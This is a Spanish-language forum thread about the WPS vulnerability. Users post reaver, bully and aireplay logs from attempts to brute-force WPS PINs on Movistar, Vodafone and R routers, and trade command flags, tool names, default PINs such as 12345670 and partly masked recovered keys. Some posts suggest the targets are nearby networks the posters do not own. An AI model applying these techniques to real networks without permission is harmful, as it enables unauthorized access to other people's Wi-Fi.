19:20:21  Sending Authentication Request (Open System)
19:20:21  Authentication successful
19:20:21  Sending Association Request

19:20:26  Sending Authentication Request (Open System)
19:20:26  Authentication successful
19:20:26  Sending Association Request

19:20:31  Sending Authentication Request (Open System)

19:20:33  Sending Authentication Request (Open System)

19:20:35  Sending Authentication Request (Open System)

19:20:37  Sending Authentication Request (Open System)

19:20:39  Sending Authentication Request (Open System) [ACK]
19:20:39  Authentication successful
19:20:39  Sending Association Request [ACK]
19:20:39  Association successful :-) (AID: 1)

19:20:53  Got a disassociation packet! (Waiting 3 seconds)

19:20:53  Sending Authentication Request (Open System)

19:20:55  Sending Authentication Request (Open System)

19:20:57  Sending Authentication Request (Open System)

19:20:59  Sending Authentication Request (Open System)
19:20:59  Authentication successful
19:20:59  Sending Association Request [ACK]
19:20:59  Association successful :-) (AID: 1)

19:21:13  Got a disassociation packet! (Waiting 3 seconds)

19:21:13  Sending Authentication Request (Open System) [ACK]
19:21:13  Authentication successful
19:21:13  Sending Association Request [ACK]
19:21:13  Association successful :-) (AID: 1)

19:21:28  Sending keep-alive packet
19:21:28  Got a disassociation packet! (Waiting 3 seconds)

19:21:28  Sending Authentication Request (Open System)

19:21:30  Sending Authentication Request (Open System)

19:21:32  Sending Authentication Request (Open System)

19:21:34  Sending Authentication Request (Open System)

19:21:36  Sending Authentication Request (Open System) [ACK]
19:21:36  Authentication successful
19:21:36  Sending Association Request

19:21:41  Sending Authentication Request (Open System) [ACK]
19:21:41  Authentication successful
19:21:41  Sending Association Request

19:21:46  Sending Authentication Request (Open System)

19:21:48  Sending Authentication Request (Open System)

19:21:50  Sending Authentication Request (Open System)

19:21:52  Sending Authentication Request (Open System) [ACK]
19:21:52  Authentication successful
19:21:52  Sending Association Request [ACK]
19:21:52  Association successful :-) (AID: 1)

19:22:07  Sending keep-alive packet
19:22:07  Got a disassociation packet! (Waiting 3 seconds)

19:22:07  Sending Authentication Request (Open System)

19:22:09  Sending Authentication Request (Open System) [ACK]
19:22:09  Authentication successful
19:22:09  Sending Association Request [ACK]
19:22:09  Association successful :-) (AID: 1)

19:22:23  Got a disassociation packet! (Waiting 3 seconds)

19:22:23  Sending Authentication Request (Open System)

19:22:25  Sending Authentication Request (Open System)

19:22:27  Sending Authentication Request (Open System) [ACK]
19:22:27  Authentication successful
19:22:27  Sending Association Request

19:22:32  Sending Authentication Request (Open System)

19:22:34  Sending Authentication Request (Open System) [ACK]
19:22:34  Authentication successful
19:22:34  Sending Association Request [ACK]
19:22:34  Association successful :-) (AID: 1)

19:22:48  Got a disassociation packet! (Waiting 3 seconds)

19:22:48  Sending Authentication Request (Open System) [ACK]
19:22:48  Authentication successful
19:22:48  Sending Association Request [ACK]
19:22:48  Association successful :-) (AID: 1)

19:23:03  Sending keep-alive packet
19:23:03  Got a disassociation packet! (Waiting 3 seconds)

19:23:03  Sending Authentication Request (Open System)

19:23:05  Sending Authentication Request (Open System) [ACK]
19:23:05  Authentication successful
19:23:05  Sending Association Request

19:23:10  Sending Authentication Request (Open System) [ACK]
19:23:10  Authentication successful
19:23:10  Sending Association Request [ACK]
19:23:10  Association successful :-) (AID: 1)

19:23:25  Sending keep-alive packet
19:23:25  Got a disassociation packet! (Waiting 3 seconds)

19:23:25  Sending Authentication Request (Open System)

19:23:27  Sending Authentication Request (Open System) [ACK]
19:23:27  Authentication successful
19:23:27  Sending Association Request [ACK]
19:23:27  Association successful :-) (AID: 1)

19:23:41  Got a disassociation packet! (Waiting 3 seconds)

19:23:41  Sending Authentication Request (Open System)

19:23:43  Sending Authentication Request (Open System)

19:23:45  Sending Authentication Request (Open System) [ACK]
19:23:45  Authentication successful
19:23:45  Sending Association Request [ACK]
19:23:45  Association successful :-) (AID: 1)

19:24:00  Sending keep-alive packet
19:24:10  Got a disassociation packet! (Waiting 3 seconds)

19:24:10  Sending Authentication Request (Open System) [ACK]
19:24:11  Got a deauthentication packet! (Waiting 5 seconds)

19:24:16  Sending Authentication Request (Open System) [ACK]
19:24:16  Authentication successful
19:24:16  Sending Association Request [ACK]
19:24:16  Got a deauthentication packet! (Waiting 7 seconds)

19:24:23  Sending Authentication Request (Open System)

19:24:25  Sending Authentication Request (Open System)

19:24:27  Sending Authentication Request (Open System)

19:24:29  Sending Authentication Request (Open System)

19:24:31  Sending Authentication Request (Open System)

19:24:33  Sending Authentication Request (Open System)

19:24:35  Sending Authentication Request (Open System)

19:24:37  Sending Authentication Request (Open System)

19:24:39  Sending Authentication Request (Open System)

19:24:41  Sending Authentication Request (Open System)

19:24:44  Sending Authentication Request (Open System)

19:24:46  Sending Authentication Request (Open System)

19:24:48  Sending Authentication Request (Open System)

19:24:50  Sending Authentication Request (Open System)

19:24:52  Sending Authentication Request (Open System)

19:24:54  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

Los ataques con éxito suelen ser del tipo:
Código: [Seleccionar]
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+]Received WSC NACK
[+] Sending WSC NACK

En estos routers a pesar de los M del 1 al 6, no aparecen mensajes nack recibidos de ninguna forma (hasta el momento).

En este hilo se comenta un problema similar: http://markkit.net/untrusted/code.google.com_p_reaver-wps_issues_detail_id_195.html

El bully a ver si lo pruebo, pero no sé como instalarlo en xiaopan :(
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: psychys en Septiembre 01, 2013, 22:59:02 pm
Hola desde hace unos dias he estado probando con una vodafone con mac 64:16:f0 tiene excelente señal y provando con reaver me sale esto he leido que le pasa a mas gente este problema con este tipo de redes y no se soluciona bueno os pongo lo que me pasa

Código: [Seleccionar]
[+] Waiting for beacon from 64:16:F0:XX:XX:XX
[+] Switching mon2 to channel 1
[+] Associated with 64:16:F0:XX:XX:XX (ESSID: vodafonexxxx)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-01-23 15:54:52 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
asin continuamente y no cambia de pin

[time]Septiembre 01, 2013, 23:04:08 pm[/time]
Ah utilizo la alfa de 1w la tipica he probado tambien con varios adaptadores y nada igual.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Septiembre 01, 2013, 23:08:51 pm
 
Esto: # es para insertar código. 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: psychys en Septiembre 01, 2013, 23:10:36 pm
Lo siento perdona por el descuido llevo un dia
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Septiembre 01, 2013, 23:19:17 pm

No es probleama, no conocias como se hace ahora si.   ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: arane23 en Septiembre 02, 2013, 14:08:32 pm
Hola desde hace unos dias he estado probando con una vodafone con mac 64:16:f0 tiene excelente señal y provando con reaver me sale esto he leido que le pasa a mas gente este problema con este tipo de redes y no se soluciona bueno os pongo lo que me pasa

Código: [Seleccionar]
[+] Waiting for beacon from 64:16:F0:XX:XX:XX
[+] Switching mon2 to channel 1
[+] Associated with 64:16:F0:XX:XX:XX (ESSID: vodafonexxxx)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-01-23 15:54:52 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
asin continuamente y no cambia de pin

[time]Septiembre 01, 2013, 23:04:08 pm[/time]
Ah utilizo la alfa de 1w la tipica he probado tambien con varios adaptadores y nada igual.

Simplemente no es vulnerable a reaver, yo también he detectado varias de esas y nada.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: psychys en Septiembre 04, 2013, 23:27:01 pm
Pues si tiene que ser invulnerable por narices pk que he estado probado todos estos dias y nada pero en una version de reaver avanza y cambiaba de pin pero con errores y se bloqueaba en el 50% mas o menos me daba esto
Código: [Seleccionar]
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[!] WPS transaction failed, re-trying last pin
[+] Trying pin 01255676
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WPS transaction failed, re-trying last pin

Septiembre 04, 2013, 23:32:38 pm
Es muy raro pk estos routers son hg566a igual que los otros y las otras vodafone son vulnerables y es el mismo modelo de router mac descartadas de vodafone que no van con reaver de las que he probado yo y hay por mi zona

30:87:30
5C:4C:A9
64:16:F0
4C:54:99

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Charlye35 en Septiembre 30, 2013, 11:02:06 am
Buenas.

Entonces, que soft, podemos usar para auditar esas voda, que no pasan del M1 y M2?

Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: sniper1990 en Octubre 02, 2013, 13:14:36 pm
Yo diria que falla por la distancia con el AP,aparte aveis probado los comandos -w o -N ??

Saludos!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 05, 2013, 15:01:43 pm
No es por la distancia es pk parece invulnerable a reaver comprobado con varios routers de estos cercanos y nada si alguien tiene un router de estos podrian decir el pin.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Octubre 06, 2013, 03:45:49 am
Hola queria comentar algo sobre las nuevas redes MOVISTAR_XXXX con MAC : F8:1B:FA:XX:XX:XX hace una semana saque una con jumpstat en 5 segundos,y hoy he intentado con otro router y con una distro linux actualizada y nada,reaver me daba el M1,M2,M3,M4 y error,uso el comando reaver -i mon0 -b ( BSSID) -c (canal) -p (pin) -vv. Luego he vuelto a probar al router q la semana pasada me funciono con jumpstat y nada,no m la saca.Puede ser alguna actualización??
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kyrandio en Octubre 06, 2013, 09:32:06 am
haroll a mi no me saca esa, lo probé y siempre hace M1, M2, M1,,,despues pone eso de AP limit....tal,tal,tal y ahí se queda.

Supongo que han actualizado el firmware o algo.

saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 06, 2013, 12:00:58 pm
Comprobado firmware actualizado 100% acabo de probar con una y me sale lo que comentáis movistar se pone las pilas chicos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: cristi_28 en Octubre 06, 2013, 15:19:16 pm
lo que a mi me pasa es que reaver se salta el pin 1234xxxx y continua con el siquiente con  bully no pasa esto y saca la clave ,comprobado hace 10 sec porsupuesto estoy probando  en una red movistar
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 06, 2013, 19:27:14 pm
Si eso me pasa en reaver pasa de pin como si nada y nunca da la clave habra que probar en bully por cierto estari probar con las vodafone estas 64:16:f0 seria bueno si alguien prueba que comente ya que en reaver es inutil saludos :) ;)

Octubre 06, 2013, 21:21:38 pm
Hola pongo el error que sale en reaver con las MOVISTAR_XXXX
Código: [Seleccionar]
[+] Switching mon0 to channel 10                                                                                                                     
[+] Waiting for beacon from F8:1B:FA:                                                                                                     
[+] Associated with F8:1B:FA (ESSID: MOVISTAR_XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred

Cambia de pin y da este error también  pero debería de dar la key con el primer pin que siempre prueba reaver ya que es el pin por defecto que tienen asignado estos routers ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: cristi_28 en Octubre 06, 2013, 22:05:15 pm
[!] Bully v1.0-19 - WPS vulnerability assessment utility

Saved session to '/root/.bully/f81bfaxxxxxx.run'

        PIN : '1234xxxx'
        KEY : 'THSWzhLxxxxxxxxxxxxxx'
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 06, 2013, 22:41:41 pm
Muy bien cristi_28 gracias por probarlo y tu tiempo habra que probarlo en bully ya que se ve que funciona :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: rober en Octubre 07, 2013, 01:02:11 am
Hola, las nuevas MOVISTAR_XXXX, mismo pin de siempre o sea..12XXXX70, clave 20 dígitos numeros y minúsculas, parece que han cambiado el patron, antes creo que habia tambien mayusculas....en raver me daba error, bully no lo he probado parece que si funciona con esta aplicación por lo que he leído, yo la he sacado con la aplicación de alfa newort, que ya sabéis que la lleva (configuración protección wifi), no se porque no funciona en raver, los expertos le podrían echar un ojo a ver....saludines
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Octubre 07, 2013, 20:29:14 pm
Cierto,he vuelto ha probar con los routers antes mencionados y con reaver nada,con bully normal nada,sin checkstum nada tampoco,me daba erroes en la autentificacion parece,y despues probe en windows con jumpstart y sin problemas se conecto.Esa es mi experiencia aver si alguien sabe algo mas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Octubre 07, 2013, 20:53:57 pm
Añade los comandos -a -f a reaver, te permitirá asociar fácilmente. El router se bloquea cuando pruebas seguido varios pin. Lo mejor es conectarse directamente con Windows 7. El pin parece que siempre es el mismo. Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Octubre 07, 2013, 21:43:40 pm
Hola,me puedo conectar directamente con el pin en windows 7??.Esq no he encontrado la manera.gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 07, 2013, 22:08:31 pm
Bajate Dumpper la ultima versión con este pograma creo que te puedes conectar con el pin pero no lo se seguro pk alomejor para conectarte con el pin el router debe de tener para que te conectes en modo pin pero no lo se prueba haber con el pogramilla este que esta muy bien debes tener también jumpstart para poder conectarte con el pin :) ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Octubre 07, 2013, 22:15:17 pm
Citar
Hola,me puedo conectar directamente con el pin en windows 7??.Esq no he encontrado la manera.gracias
???  aparte de lo que te dice Clima-sol-84 ¿probaste a mirar en las chinchetas del sub-foro videos y manuales..?   ::)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Octubre 09, 2013, 17:14:19 pm
jejeje ya conozco esos programas.Me gustaría saber si hay alguna forma de hacerlo sin software adicional.Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 09, 2013, 17:40:52 pm
Si la red de la manera normal no te pide el pin tendrás que hacerlo con el programa pk el router no lo tiene para que te conectes con pin.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: slide200 en Octubre 10, 2013, 15:35:08 pm
Hola, alguien sabría decirme por qué cuando intoduzco el pin WPS válido, llega al 98,2 % y me da una clave falsa es decir:
WPS PIN: 1236XXXX
WPA PSX: 64 carácteres hexadecimal (números y letras en mayúsculas)
AP SSID: Network -54:E6:FC:XX:XX:XX

Cada vez que hago el ataque con el pin, me da una clave distinta siempre. He visto que a un usuario de este foro le pasa lo mismo que a mí, pero no he entendido muy bien la respuesta.

Gracias!  :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 10, 2013, 16:20:07 pm
Te da una clave diferentes pk él router lo que hace es que se protege y por eso nunca te da la correcta prueba con bully saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: slide200 en Octubre 10, 2013, 18:11:05 pm
Gracias! ;) No se lo que es bully,¿ lo instalo en ubuntu 11.10 o lo ejecuto desde wifislax? Si es desde wifislax no sé dónde está. Me podrías poner algún enlace con información? Se supone que el pin es válido, debería auditar con el pin válido o empezar desde 0? Y ya, por liarme más, con esta herramienta también se sacan las wpa de vodefone con mac 64:16:F0?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 10, 2013, 18:18:19 pm
Y si usamos un poco el buscador ... ;)
Bully, alternativa al reaver?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 10, 2013, 18:24:49 pm
Kcdtv tiene razón debes aprender a buscar en buscador el bully es una herramienta como reaver reciente  debes descargartela e instalarla en wifislax o ubuntu saludos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: slide200 en Octubre 10, 2013, 18:38:29 pm
He utilizado el buscador... pero en google!jejeje!
Gracias por la ayuda, vamos a ver como funciona. ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 10, 2013, 19:05:25 pm
No hay de que para eso estamos aquí para ayudarnos todos saludos y comenta como te fue.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pichitrin123 en Octubre 19, 2013, 21:57:07 pm
Parece que los nuevos router que esta poniendo movistar son vulnerables al ataque wps. Me he topado con dos de estos router y los dos llevan el pin 12345670

Essid: MOVISTAR_XXXX
Bssid: F8:1B:FA:XX:XX:XX
Key: 3L0XXXXXXXXXXXXXXXXX
Wps Pin: 12345670

Essid: MOVISTAR_XXXX
Bssid: F8:1B:FA:XX:XX:XX
Key: S6BXXXXXXXXXXXXXXXXX
Wps Pin: 12345670

La clave son 20 digitos con mayusculas y minusculas de la A a la Z y numeros del 0 al 9


buenas.he probado con este pin en una red con esa mac MOVISTAR_XXXX
Bssid: F8:1B:FA y no funciona. tenéis algun pin mas por ahí para probar?saludos!!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Clima-sol-84 en Octubre 19, 2013, 23:29:51 pm
Con bully al parecer si te da el pin y la clave lo comprobo cristi_28 con reaver  no te la da nose por que.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: pichitrin123 en Octubre 20, 2013, 01:08:56 am
voy a probarlo ahora mismo y comento.gracias!


Octubre 20, 2013, 01:42:30 am
buenas.pensaba que el bully venia en xiaopan o en wifislax como un programa de estos acoplados.la verdad es que no se casi nada del bully,he estado investigando un buen rato la verdad e incluso he conseguido descargar la version BullyWPS+2.1 (1).sh. ahora mi pregunta es.si yo cargo el xiaopan o el wifislax desde la unidad de cd,como meto el programa bully?en un pen drive se supone pero como se ejecuta?como va?.otra pregunta.hay alguna version del xiaopan o wifislax que lo lleve ya incorporado?.gracias por la ayuda y disculpad mi ignorancia!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: TREVY en Noviembre 06, 2013, 13:08:37 pm
En wifislax le das al botón derecho en la carpeta donde tienes el script y le das a abrir terminal aquí.
Se te abrirá una ventana tipo ms-dos. Escribes (en tu caso que parece que lo has bajado dos veces  :P):
wash BullyWPS+2.1 (1).sh
y ya puedes usarlo.
En Xiaopan no me acuerdo hace mucho que no lo uso
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maik_90 en Noviembre 25, 2013, 18:13:03 pm
Alguno sabe si en distros actualizadas viene solucionado ya el tema del error de reaver 99,99%?

Gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Diciembre 05, 2013, 01:32:52 am
Tengo un problema.
Haber si a alguien mas le ha pasado o alguien puede ayudarme.
Tengo una red y he intentado sacar la clave con reaver 1.4 y me pasa lo siguiente, despues de probar desde 0 y de uno en uno todos 4 primeros pines llega al 90,90% y se queda en el pin ( 99985677 ) porque obviamente ya no le quedan mas pines por probar puesto que el 9999xxxx ya lo prueba con anterioridad.
Que puede pasar para que no encuentre los 4 primeros numeros del pin si los prueba todos?
Podria el reaver 1.3 o el reavermod corregir este fallo?
Agradeceria a quien pudiese aportar algo de luz a este tema, gracias.

Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: 1camaron1 en Diciembre 05, 2013, 09:55:47 am
Si el tema se os queda con un 90/99% me temo que no hay mucho que hacer, salvo intentarlo de nuevo, o algo más eficaz sería el script de kcdtv WPSIN
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Diciembre 05, 2013, 15:25:36 pm
Si el tema se os queda con un 90/99% me temo que no hay mucho que hacer, salvo intentarlo de nuevo, o algo más eficaz sería el script de kcdtv WPSIN

Gracias por responder camaron.
He probado con el revaer 1.3 y lo mismo, "quitting after 11000 crack attempts"  "failed to recover wpa key"....
Intentarlo de nuevo no creo que solucione nada, ya he probado con 1.4 y 1.3 con el mismo resultado, es mas, el problema es que no saca ni los 4 primeros..y eso que el reaver 1.4 los prueba todos desde  el principio, osea que se pasa el pin por el forro..
Hablas de un script, yo uso wifislax,que es lo que hace ese script y se puede implementar en live cd?
He leido que este problema puede ser de varios factores,el ap que no suelta los 4 primeros numeros aunque sean correctos,tambien ví que habia una revision del reaver 1.4 que algunos dices se lo ha solucionado, que la ultima es la 113 o algo asi,sabeis algo de esto?
De ser cierto en que distro puedo encontrar el reaver con la ultima revision? digo en live cd,nada de ubuntu que no me las apaño nada bien  :-[
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: oscarelguapo2 en Diciembre 11, 2013, 23:52:36 pm
compañeros tengo una señal pero al probar 4 pines queda bloqueado totalmente hasta el infinito abra alguna opcion para que cuando reaver pruebe el tercer pin ponerle stop y despues Go de un rato volver a probar otros 3 y asi..... la verdad no se si sirva esto alhuien piensa que sirva esto que comento
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Diciembre 11, 2013, 23:56:45 pm
Hola,aqui os pongo unas fotos para que veais el problema.
He probado mi red con wifislax 4.7.2 final,con reaver wifislax,bully,reaver 1.4,etc.. y no consigo que pase del 90,90%,osea que me dé los 4 primeros digitos del pin...
A ver si alguien me puede hechar un cable...

(http://.us/a/img440/4458/d5my.jpg)

(http://.us/a/img545/7396/43nb.jpg)

(http://.us/a/img580/5917/3ncf.jpg)

(http://.us/a/img542/872/pbk8.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: haroll en Diciembre 12, 2013, 00:15:39 am
Hola,podrías facilitar un poco mas de información,como modelo del router MAC, comandos que usas con reaver.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Coeman76 en Diciembre 12, 2013, 00:18:11 am
Si has probado con todos los softwares habidos y por haber y no encuentra los 4 primeros digitos parece mas tema de proteccion del router o de interpretacion de la comunicacion entre ellos que de los softwares que utilizas....no creo que te vaya a dar un resultado distinto cambiar entre ellos.

Que mac és?
Distribuidor?
Tienes mas datos?

Citar
Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje.

Nops
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ssymon12 en Diciembre 12, 2013, 00:18:37 am
Primero tienes que decir que mac tiene la red que vas abrir...¡¡¡seguro que es 8c:0c:a3...si es asi intenta con el dualreaver de notepad....modificado...y lo solucionas..aaaaaaa por cierto asta que no tira M5 y M6 no averigua los 4 primeros digitos...un saludo ..
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: blasiring en Diciembre 12, 2013, 00:28:47 am
Si,la mac es esta:

66:29:7C:xx:xx:xx

es un broadcom de la operadora gallega de cable "R"

Diciembre 12, 2013, 19:26:40 pm
Probado con el comando "reaver -i mon0 -c CANAL -b MAC-AP -n -vv" recomendado por un usuario.
Resultado,el de la imagen....
A mi parecer los fabricantes están espabilando en el tema del wps,no creeis?

(http://.us/a/img39/851/tczj.jpg)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: peluzza en Diciembre 18, 2013, 13:44:49 pm
Hola! sin duda has descubierto otro router que no realiza el checksum en el pin estandar. Reaver JAMAS crackeará ese pin, porque explicado sencillamente:

En el estandar de WPS el pin se compone de 7 números + dígito checksum => 11000 posibles pines (10000 de los primeros 4 y 1000 de los 3 restantes sin contar el checksum que es facilmente calculable)

